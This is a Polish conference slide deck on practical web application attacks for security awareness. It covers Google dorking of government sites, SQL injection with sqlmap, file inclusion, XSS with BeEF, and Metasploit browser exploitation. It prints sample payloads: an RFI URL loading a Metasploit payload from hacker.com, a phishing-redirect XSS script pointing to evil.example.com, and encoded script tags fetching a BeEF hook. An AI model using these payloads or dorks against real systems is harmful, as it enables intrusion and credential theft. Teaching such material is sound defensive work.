�ݺ�ߣ

Adam Ziaja <adam@adamziaja.com>
http://adamziaja.com
Praktyczne ataki na aplikacje webowe

Adam Ziaja, OSCP http://adamziaja.com
• Pentester w dużej grupie bankowej
• Test penetracyjny jest to kontrolowany atak na
system teleinformatyczny przeprowadzany z
perspektywy potencjalnego włamywacza

Informacje o prezentacji
• Prezentacja ma na celu uświadomienie jak prosto
można wykonywać ataki na aplikacje webowe
• Wszystkie elementy samych ataków są symulacjami
przeprowadzonymi w środowisku laboratoryjnym
(dlatego też wszystkie zrzuty ekranów wykonane są z
prywatną klasą adresową)
© Adam Ziaja <adam@adamziaja.com>

Jeden z najsłabszych punktów bezpieczeństwa IT
• Statystycznie najprostszą metodą włamania jest
wykorzystanie podatnej strony internetowej
(nie licząc „podatnych” ludzi – phishing itd )

Ataki na strony rządowe
dokonywane m.in. przez Anonymous Poland
• Czy można włamać się na „długiej przerwie”
(20 min)?
Google hacking:
"SQL syntax" site:gov.pl

Google Hacking Database (GHDB)
https://www.exploit-db.com/google-hacking-database/
• Gotowa baza zapytań do wyszukiwarki Google, dzięki
której znaleźć można m.in. takie informacje jak:
• Podatne strony internetowe (np. przez komunikaty z
błędami oraz stopki zawierające informacje o
działającym oprogramowaniu, często wraz z wersją)
• „Głęboko ukryte” pliki (czyli w trudnej do odgadnięcia
lokalizacji)
• Hasła, numery kart kredytowych
• Urządzenia sieciowe (np. podatne routery)
• …wszystko co znalazła wyszukiwarka Google

SQL Injection (SQLi)
…błąd SQLi występuję wtedy kiedy
użytkownik może zmodyfikować
zapytanie do serwera w taki sposób,
że aplikacja prześle je dalej, a baza
danych wykona zmodyfikowane
zapytanie
…może również zawierać komunikat o błędzie z bazy danych
(oczywiście tylko w przypadku jego wystąpienia)
…atak SQL Injection jest atakiem
typu server-side (po stronie serwera),
atakowany jest bezpośrednio serwer

/* zrzuty ekranu z marca 2013, błąd już nie istnieje */

SELECT * FROM `pages` WHERE `pages_tag` = '2'' LIMIT 1
w tym miejscu możemy zmodyfikować zapytanie do bazy danych MySQL
…komunikat o błędzie w zapytaniu SQL zwrócony przez bazę danych MySQL

• Czy trzeba znać język SQL i techniki
manipulacji zapytaniami aby się włamać?
• sqlmap – narzędzie do automatycznych
ataków SQL Injection

• Krok po kroku
• Jeśli nie wiadomo co
kliknąć wystarczy ENTER i
wybrana zostanie
domyślna wartość
• Efektem końcowym jest
uzyskanie dostępu do
wiersza poleceń systemu
operacyjnego z
uprawieniami aplikacji
www
• Najczęściej występuje już
wtedy możliwość
podmiany zawartości
strony internetowej
• Ew. dalsza ręczna lub
automatyczna eskalacja
uprawnień np. przy
pomocy modułów MSF do
ataków lokalnych

Metasploit Framework (MSF)
Oprogramowanie służące do testów
penetracyjnych i łamania zabezpieczeń
systemów teleinformatycznych

• SQL Injection to nie tylko problem aplikacji
webowych, ataki można przeprowadzać na
wiele sposobów np. przez:
• Oprogramowanie OCR (technika rozpoznawania
tekstu w plikach graficznych)
• Kod kreskowy
• […]

SQL Injection w życiu codziennym
sposób na fotoradary?
(OCR)

SQL Injection w życiu codziennym
Przykładowe kody kreskowe mogące ujawnić podatność SQLi:

Remote File Inclusion (RFI)
• Możliwość zdalnego załadowania pliku,
którego zawartość zostanie wykonana po
stronie podatnego serwera
• Dzięki załadowaniu payloadu MSF uzyskujemy
dostęp do wiersza poleceń systemu
operacyjnego…
• abc.pl/i.php?file=http://hacker.com/msf.txt

Local File Inclusion (LFI)
• Możliwość załadowania lokalnego pliku,
którego zawartość zostanie wykonana
• Analogicznie do RFI jeśli jest możliwość
załadowania payloadu MSF to istnieje
możliwość uzyskania dostępu to wiersza
poleceń systemu operacyjnego
• abc.pl/i.php?file=/tmp/msf.txt

Przykładowy scenariusz ataku bez MSF, w przypadku jeśli
serwer www może odczytać własne logi:

…następnie lokalna eskalacja uprawnień
np. przez luki w konfiguracji lub exploitację

Bezpieczeństwo aplikacji webowych to nie tylko
ataki po stronie serwera, ale również ataki
client-side (po stronie klienta), w których
atakowany jest bezpośrednio klient.

Cross-Site Scripting (XSS)
• Atak polegający na osadzeniu w treści atakowanej
strony kodu wykonywanego po stronie klienta
(zazwyczaj) JavaScript (np. umieszczony w komentarzu)
• Dwie główne metody ataków XSS:
• Stored
• Reflected

Stored XSS

Reflected XSS

XSS payload (ładunek)
<script>
document.body.innerHTML='Aby zobaczyć tę stronę musisz się
<a href="http://evil.example.com">zalogować</a>. Za 5
sekund zostaniesz automatycznie przeniesiony do strony
logowania.'
setTimeout('location.replace("http://evil.example.com")',
5000)
</script>

XSS, możliwości m.in.:
• Kradzież poświadczeń (np. zawartość „cookies”)
• Modyfikacja treści i wyglądu strony
• Przekierowanie na inną stronę
• Podsłuch w obrębie danej strony internetowej…

• BeEF http://beefproject.com – framework do
ataków XSS
zielona ramka – ofiara
czerwona ramka – atakujący
przykładowa zmienna GET podatna na reflected XSS
XSS payload (ładunek) nawiązujący połączenie z BeEFem
strona zawiera panel logowania

• Ogólne dane o
przeglądarce oraz
systemie
• Aktywne
komponenty itp

• Atakujący przy pomocy BeEF-a umieszcza keylogger w
pływającej ramce, w której załaduje się „login.php”
• Atakujący podsyła ofierze odnośnik z XSS-em…
• %3Cscript%20src%3Dhttp%3A//hacker.com%3A3000/hook.js%3E%3C/script%3E
• %3Cscript%20src%3Dhttp%3A//xn--kda4b0koi.pl%3E%3C/script%3E
• xn--kda4b0koi.pl – zakodowana forma (ACE) domeny żółć.pl

Przykładowy scenariusz ataku
(w przypadku podatności XSS na routerze)

• Atakujący ustawia
proxy w przeglądarce
na 127.0.0.1:6789
• Łączy się do strony
podatnej na XSS za
pośrednictwem
komputera ofiary
(czyli z jej adresem IP)
• Loguje się
podsłuchanym
hasłem lub próbuje
domyślne hasło dla
danego routera…
• Zmiana adresów DNS,
poznanie hasła WiFi…

Cross-Site Scripting (XSS)
Podatność można wykorzystać nie tylko do kradzieży
poświadczeń ale również np.:
• Ataku (D)DoS (szczególnie w przypadku stored XSS)
• Przekierowania (analogicznie jak w pierwszym
przykładzie „location.replace”) na payload
Metasploita w celu zaatakowania podatnej
przeglądarki użytkownika

Atak z wykorzystaniem MSF

• Exploit na IE8
• Atakujący zyskuje
pełen dostęp do
wiersza poleceń
systemu Windows
• …i może zrobić to
samo co w trybie
graficznym
…w przypadku jeśli
użytkownik nie działa z
prawami administratora

• Uzyskanie uprawnień
administratora przez
zastosowanie
lokalnego exploita
• Dodanie własnego
użytkownika
• Dodanie uprawnień
administratora
• Dodanie możliwości
łączenia na zdalny
pulpit (RDP)
• Uruchomienie usługi
RDP (nie występuje na
zrzucie ekranu)
• Odblokowanie RDP na
firewallu
• Połączenie na RDP…

Podsumowanie
Dzięki podatnej stronie atakujący może np.:
• Uzyskać pełen dostęp do serwera
• Uzyskać pełen dostęp do stacji roboczej
użytkownika
• Dalej na wiele sposobów eskalować zdobyte
uprawienia np. przez sieć lokalną do której
podpięty jest serwer lub użytkownik

Prawdziwi hakerzy (w większości
przypadków) nie podmieniają stron
internetowych ale utrzymują dostęp…

Podsumowanie
• Zaprezentowana została tylko bardzo niewielka
część z najpopularniejszych ataków
• „Bezpieczeństwo aplikacji webowych”
(publikacja TAPT 2014) – opis ataków oraz
metody ich wykrywania z punktu widzenia
informatyki śledczej
metodyki testów penetracyjnych

Jak żyć?
Zatrudnić pentesterów lub zlecać testy
penetracyjne zewnętrznym podmiotom 

Czy trzeba w ogóle się znać,
aby się włamać?
hasła są jak majtki:
zmieniaj je często, nie zostawiaj na widoku i nie pożyczaj obcym
to zależy…

Adam Ziaja <adam@adamziaja.com>
http://adamziaja.com
Dziękuję za uwagę!

�ݺ�ߣ

Praktyczne ataki na aplikacje webowe (TAPT 2015)

More Related Content

Praktyczne ataki na aplikacje webowe (TAPT 2015)